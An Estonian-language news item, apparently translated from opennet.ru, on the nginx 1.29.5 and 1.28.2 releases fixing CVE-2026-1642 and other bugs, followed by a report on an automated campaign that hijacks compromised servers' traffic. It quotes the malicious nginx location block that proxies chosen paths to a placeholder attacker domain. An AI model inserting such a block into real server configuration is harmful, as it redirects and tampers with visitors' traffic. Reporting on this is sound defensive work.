Välja on antud nginx 1.29.5 põhiharude versioon, mille raames jätkub uute võimaluste arendamine ning samaaegselt hooldatava stabiilse haru nginx 1.28.2 vabastamine, kuhu lisatakse vaid tõsiste viga ja turvaprobleemide likvideerimisega seotud muudatusi. Uuendustes on likvideeritud nõrkus (CVE-2026-1642), mis võimaldab ründajal, kellel on võimalus sekkuda (MITM) nginx ja upstream-serveri vahelisse suhtlusesse, asendada kliendile edastatavad vastused. Probleem on seotud seadistustega, mis suunavad päringud (HTTP 1.x, HTTP/2, gRPC või uWSGI) ülemisele serverile TLS-krüpteerimise kasutamisega.
Lisaks nõrkusele versioonis 1.29.5 on SSL-aja tõrgete logimise tase «ech_required» langetatud «crit» tasemelt «info» tasemele ning on kõrvaldatud mitmeid probleeme: kõrvaldatud on juurdepääs juba vabastatud mälule (use-after-free) järgmisele gRPC või HTTP/2 backendile üleminekul; lahendatud probleem, kus järgmise upstream-serveri üleminekul saadetakse vale HTTP/2 päring; parendatud on mitme vahemikuga vastuse suuruse suurenemist; seatud on HTTP_HOST muutuja õigesti FastCGI, SCGI ja uwsgi backendide suunamisel.
Lisaks võib märkida automatiseeritud rünnaku tuvastamist, mis pärast eduka häkkimise serverid piirdub nginx seadete muutmisega. Häkker toimib kaudu parandamata nõrkuse React2Shell serverikomponentides React süsteemides, millel on hostimisjuhtpaneelidega, nagu Baota (BT). Nginx konfiguratsioonis tehtud muudatused suunasid päringud ründajate serverisse, mis suunas kasutajatele tagastatud vastuse hulka kahjulikke muudatusi. location /%PATH%/ { set $fullurl "$scheme://$host$request_uri"; rewrite ^/%PATH%/?(.*)$ /index.php?domain=$fullurl&$args break; proxy_set_header Host [Attacker_Domain]; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Forwarded-Proto $scheme; proxy_set_header User-Agent $http_user_agent; proxy_set_header Referer $http_referer; proxy_ssl_server_name on; proxy_pass http://[Attacker_Domain]; }
Seega, ruttide või pahavara installimise asemel serverisse, korraldatakse rünnakud klientidele, kes avavad serveris teenindatavat veebilehte, ilma et serveri veebisaiti komponente otseselt muudataks. Rünnak on peamiselt suunatud Aasia riikide domeenide, samuti domeenide *.edu ja *.gov liikluse püüdmiseks. Rünnakute kaudu suunatakse valikuline liiklus, näiteks seotud teede kaudu sõnu "pg", "pgslot", "slot", "game", "casino", "live", "help", "news", "page", "blog", "about", "support" ja "info". Rünnakud viiakse läbi automatiseeritult ning kasutatakse tööriistu, mis otsivad ja analüüsivad nginx konfiguratsiooni, valivad ja sisestavad seadistuste malli, taaskäivitavad nginx ja kontrollivad muudetud versiooni toimimist.

Allikas: opennet.ru
